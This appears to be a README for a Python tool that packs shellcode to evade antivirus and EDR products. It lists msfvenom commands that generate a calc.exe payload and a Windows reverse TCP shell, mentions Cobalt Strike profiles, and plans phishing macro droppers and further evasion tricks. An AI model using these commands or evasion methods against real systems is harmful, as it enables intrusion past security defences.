I started writing these tools as a way to both challenge myself and expand upon my knowledge within the esoteric world of AV/EDR evasion. Currently tested again 1 x enterprise grade EDR solution, however I expect that this technique will be patched soon.

Requires: python3, pycryptodome
Usage: script.py payload.bin
Example payloads: msfvenom -p windows/x64/exec CMD=calc.exe -f raw -o calc.bin
msfvenom -p windows/x64/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f raw > shell.bin

For Cobalt Strike you will need to use a custom profile, and using the payload generator seems to work best, rather than selecting Windows Executable from packages.

If anyone wants to build their own tools/malware in C#, there are many fantastic resources out there, however I also included some c# templates that you can reference.

[:gem:] Build option to generate payload for C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe
[:gem:] Build option to generate macros for use with phishing droppers
[:gem:] Add options for different obfuscation and evasion techniques e.g. explore Halo's gate implementation

I keep my notes on malware dev here

Follow me on twitter if you want.